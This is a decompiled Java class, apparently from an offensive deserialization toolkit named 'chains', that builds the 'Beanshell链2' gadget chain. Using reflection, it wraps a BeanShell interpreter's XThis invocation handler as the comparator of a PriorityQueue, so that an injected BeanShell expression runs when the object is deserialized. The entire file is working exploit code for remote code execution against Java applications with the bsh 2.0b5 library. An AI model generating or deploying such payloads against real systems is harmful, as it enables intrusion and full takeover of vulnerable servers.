package com.ar3h.chains.gadget.impl.javanative.beanshell;

import bsh.Interpreter;
import bsh.NameSpace;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.util.Comparator;
import java.util.PriorityQueue;

@GadgetAnnotation(name = "Beanshell链2", authors = {Authors.KILLER}, dependencies = {"org.beanshell:bsh:2.0b5"})
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.Beanshell_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/beanshell/BeanShell2.class */
public class BeanShell2 implements Gadget {
    public PriorityQueue getObject(String str) throws Exception {
        Interpreter interpreter = new Interpreter();
        Method declaredMethod = interpreter.getClass().getDeclaredMethod("setu", String.class, Object.class);
        declaredMethod.setAccessible(true);
        declaredMethod.invoke(interpreter, "bsh.cwd", ".");
        interpreter.eval(String.format("compare(Object foo, Object bar) {%s;return new Integer(1);}", str));
        Class<?> cls = Class.forName("bsh.XThis");
        Field declaredField = cls.getDeclaredField("invocationHandler");
        declaredField.setAccessible(true);
        Constructor<?> declaredConstructor = cls.getDeclaredConstructor(NameSpace.class, Interpreter.class);
        declaredConstructor.setAccessible(true);
        Object newInstance = declaredConstructor.newInstance(interpreter.getNameSpace(), interpreter);
        declaredField.setAccessible(true);
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, (InvocationHandler) declaredField.get(newInstance));
        PriorityQueue priorityQueue = new PriorityQueue(2);
        priorityQueue.add("1");
        priorityQueue.add("2");
        Field declaredField2 = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        declaredField2.setAccessible(true);
        declaredField2.set(priorityQueue, comparator);
        return priorityQueue;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }
}
